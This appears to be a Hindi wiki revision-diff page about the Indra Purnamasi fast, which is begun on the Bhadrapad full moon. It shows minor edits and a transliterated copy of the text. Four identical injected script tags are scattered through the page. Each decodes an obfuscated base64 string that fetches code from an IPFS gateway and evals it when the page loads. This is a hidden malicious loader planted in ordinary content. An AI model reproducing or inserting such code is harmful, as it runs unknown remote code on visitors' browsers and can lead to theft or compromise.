Difference between revisions of "इन्द्र पूर्णमासी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[भाद्रपद]] की [[पूर्णिमा]] पर उपवास करके आरम्भ करना चाहिए।
 
*यह व्रत [[भाद्रपद]] की [[पूर्णिमा]] पर उपवास करके आरम्भ करना चाहिए।
 
*इस व्रत में तीस गृहस्थों का उनकी पत्नियों के साथ आभूषणों के सहित सम्मान करना चाहिए।  
 
*इस व्रत में तीस गृहस्थों का उनकी पत्नियों के साथ आभूषणों के सहित सम्मान करना चाहिए।  
 
*इसके करने से मोक्ष की प्राप्ति होती है।<ref>गदाधरपद्धति (176), हेमाद्रि व्रतखण्ड (2, 196)।</ref>
 
*इसके करने से मोक्ष की प्राप्ति होती है।<ref>गदाधरपद्धति (176), हेमाद्रि व्रतखण्ड (2, 196)।</ref>
  
{{लेख प्रगति
+
 
|आधार=आधार1
+
{{प्रचार}}
|प्रारम्भिक=
+
{{संदर्भ ग्रंथ}}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 05:28, 14 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat bhadrapad ki poornima par upavas karake arambh karana chahie.
  • is vrat mean tis grihasthoan ka unaki patniyoan ke sath abhooshanoan ke sahit samman karana chahie.
  • isake karane se moksh ki prapti hoti hai.[1]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. gadadharapaddhati (176), hemadri vratakhand (2, 196).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>